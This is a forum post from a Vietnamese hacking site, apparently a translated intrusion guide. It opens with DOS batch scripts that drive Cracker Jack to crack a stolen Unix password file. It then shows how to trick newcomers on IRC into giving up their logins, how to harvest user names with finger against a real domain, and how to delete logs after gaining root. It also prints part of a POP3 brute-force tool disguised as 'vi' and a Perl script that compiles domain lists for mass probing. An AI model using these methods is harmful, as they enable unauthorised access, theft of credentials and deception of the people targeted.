jpp -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.0 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %2

---------------- end of dicthash.bat

---------------- start of jackhash.bat@echo off
cls
echo - THIS FILE FOR DOS
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your password file.
echo - Then use this batch file using the following format:
echo -
echo - jackhash.bat passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - jackhash will first load jack running the passwd file against
echo - itself in both upper and lower cases, then it will add numbers 0-9
echo - both to the begining and end of every dict word. This will take
echo - a while, so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you smilie

jpp -gecos:5 -lower %1 | jack -stdin %1
jpp -gecos:5 %1 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.q | jack -stdin %1


jpp -gecos:2 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1


jpp -gecos:4 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1


jpp -gecos:8 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1

--------------- end of jackhash.bat
B. "Nói chuyện" với các account của newbie
Có nhiều cách khác để lấy được một account mà không phải làm gì nhiều. Tự vào một kênh IRC do chính bạn lập nên có chủ đề liên quan đến hacking. Kênh đó có thể bao gồm :#hacking #unix #unixhacking #hack #hackers #hacker #virus #virii
#hackers_hideout hay bất cứ thứ gì bạn nghĩ ra...
Bây giờ những gì bạn phải tìm kiếm là những newbie đang muốn học cách khai thác lỗi trên shell của chính họ, sẽ luôn luôn có một ai đó ngoài kia không biết được nhiều bằng bạn . Xem xem ai đó đang đưa ra các câu hỏi kiểu "newbie" và không nhận được câu trả lời nào hay bị kick khỏi kênh. Đó chính là dấu hiệu nhận biết cho bạn. smilie
Hãy nói chuyện với anh ta (/msg), để đừng ai biết bạn đang làm việc này, bắt đầu hỏi anh ta vài câu hỏi , cố gằng giúp đỡ anh ta, nhưng đừng nhiều quá . Cuối cùng nói với anh ta rằng bạn có thể login thay cho anh ta và làm việc đó cho anh ta. Hãy tóm lấy password file, có chúa mới biết được (GOD knows what.). Hứa hen với anh ta cả thế giới , và nhận lấy password để login. Bây giờ bạn đã có được bước khởi đầu và hãy bắt đầu quá trình thực hành. Nếu bạn lấy được root trên hệ thống , bạn có thể không muốn phô ra với anh ta , tuy nhiên bạn có thể vỗ về anh ta bằng vài "cái kẹo" bằng cách làm cho anh ta bận rộn mỗi khi bạn đánh hơi thấy những password khác(không phải của root) trên hệ thống.

VÌ vậy nếu bạn có đưa cho ai đó có nick i-e ngoài kia login và pass của bạn thì hãy yên tâm là những gì ở trên sẽ không bao giờ xảy ra...

Tôi chỉ muốn mọi người học hỏi vì vậy ex là sự thật khi tôi nói tôi đã công bố một cách thành thật cho mọi người những gì mà tôi đã từng trải qua
C. Con đường gian nan
Vẫn là chuyễn crack password file, còn một cách khác để bạn làm việc này. Chắc chắn rằng trên hầu hết các hệ thống lớn, user không sử dụng các password an toàn, từ một shell hãy làm như sau :

QUOTE
finger @domainname.com

Hãy nhìn tôi sẽ làm một domain thực:

QUOTE
[10:35am][/home/ii]finger @starnet.net
[starnet.net]
Login¦nbsp; ¦nbsp; Name¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; Tty¦nbsp; Idle¦nbsp; Login Time¦nbsp; Office¦nbsp; ¦nbsp; Office Phone
chris¦nbsp; ¦nbsp; Chris Myers¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; p2¦nbsp; 4:46¦nbsp; Jan 27 11:19
mike¦nbsp; ¦nbsp; Mike Suter¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; p1¦nbsp; 4:57¦nbsp; Jan 22 16:14
mike¦nbsp; ¦nbsp; Mike Suter¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; p5¦nbsp; ¦nbsp; 3d¦nbsp; Jan 16 15:35
root¦nbsp; ¦nbsp; System Administrator¦nbsp; p3¦nbsp; 4:59¦nbsp; Jan 16 10:17
wendt¦nbsp; ¦nbsp; Catherine Wendt-Bern¦nbsp; p0¦nbsp; ¦nbsp; ¦nbsp; 3¦nbsp; Jan 21 14:49
[10:35am][/home/ii]


Bây giờ có thể chúng ta muốn login muộn , ghi lai các thông tin sau:
Login chris Password try: Chris, chris, myers, Myers, chrismyers, etc...
Cái sau có trông có vẻ tốt: wendt:Catherine:catherine
Đây là một lệnh khác :

QUOTE
[10:35am][/home/ii]finger -l @starnet.net
[starnet.net]


Login: mike Name: Mike Suter
Directory: /usra/staff/mike Shell: /bin/csh
On since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from mikesbox.starnet.net
On since Thu Jan 16 15:35 (CST) on ttyp5, idle 3 days 22:00, from mikesbox
Last login Sun Jan 26 23:07 (CST) on ttyp2 from hurk
No Plan.

Login: root Name: System Administrator
Directory: /root Shell: /bin/csh
On since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from mikesbox.starnet.net
Last login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet.net
Mail forwarded to:
\chris@admin.starnet.net
#\chris@admin.starnet.net, \mike@admin.starnet.net
No Plan.

Login: wendt Name: Catherine Wendt-Bernal
Directory: /usra/staff/wendt Shell: /bin/csh
On since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedout
No Plan.


Bạn đã có nhiều hơn thông tin khi chơi trò này smilie
Tôi biết việc này sẽ khiến bạn cảm thấy nhàm chán...
Hãy nhớ rằng cái thứ khốn khiếp này(stuff) sẽ ghi lại các lần thử của bạn, vì vậy nếu bạn đã thành công(get on) và có được root, hãy xóa hết các log đi .
Đây là một file .c nhỏ bạn có thể sử dụng nếu bạn đã thành công:


QUOTE
pop3hack.c
----- cut here

#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>

/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT 110

/* What we want our program to be masked as, so nosy sys admin's don't kill us */
#define MASKAS "vi"

/* Repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. If set to 0, it will hack until it finds
1 user/password then exit. If set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT 0

----- cut here



Bạn cũng có thể viết một perl script nhỏ , co nhiệm vũ búng (finger) at sign (@) ra khỏi một danh sách domain, và kéo câu trả lời đến một file, sau khi hoàn tất việc này, nó sẽ trở lại và cố gắng login sử dụng pop3d username-username (hay thông tin khác) và đặt câu trả lời trong một file khác cho bạn.
Bạn có thể ftp đến rs.internic.net:
Trong thư mục domain bạn sẽ tìm thấy :

com.zone.gz
edu.zone.gz
gov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz

Hãy download các file trên về và chạy getdomain.pl (script có ở dưới đây) trên những domains bạn muốn nhắm đến đầu tiên, trong trường hợp này là:

QUOTE
perl getdomain.pl com.zone com >com.all

Lệnh này sẽ quét tất cả các domain .COM (dot com domain) và đặt tất cả chúng vào file có tên com.all
Cũng vậy nếu bạn muốn làm với tất cả các file .EDU bạn sẽ gõ :

QUOTE
perl getdomain.pl edu.zone edu >edu.all


Và bây giờ bạn đã có một danh sách để sử dụng "máy dò" (probe) có tên edu.all.
Đây là perl script


QUOTE
getdomain.pl
---- cut here
#!/usr/bin/perl

# GetDomain By Nfin8 / Invisible Evil
# Questions /msg i-e or /msg i^e
#
# Retrieve command line arguments.
my($inputfile, $domain) = @ARGV;
usage() if (!defined($inputfile) || !defined($domain));

# Open and preprocess the input file.
open(INFILE, "<$inputfile") or die("Cannot open file $inputfile for reading!\n");
my(@lines) = <INFILE>;

# Initialize main data structure.
my(%hash) = {};
my($key) = "";

foreach (@lines) {
$key = (split(/\ /))[0];
chop($key);
next if ((($key =~ tr/.//) < 1) ||
(uc($domain) ne uc(((split(/\./, $key))[-1]))) ||
($key =~ m/root-server/i));
$hash{$key}++;
}

# Close input file and output data structure to STDOUT.
close(INFILE);

foreach (sort(keys(%hash))) {
print "$_\n";
}

sub usage {
print("\n\ngetdomain:\n");
print("Usage: getdomain [inputfile] [search]\n\n");
print("Where [search] is one of \'com\', \'edu\', \'gov\', \'mil\' or \'net\'.\n\n");
exit(0);
}

0;

---- cut here - end of script -----


Để sử dụng script ở trên , tất cả những gì bạn cần là copy đoạn mã trên vào một file text rồi đặt tên cho nó là getdomain.pl, copy file đó vào một Unix OS, rồi gõ

QUOTE
chmod +x getdomain.pl


Và bây giờ nó đã sẵn sàng để chạy với những dòng lệnh ở trên.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|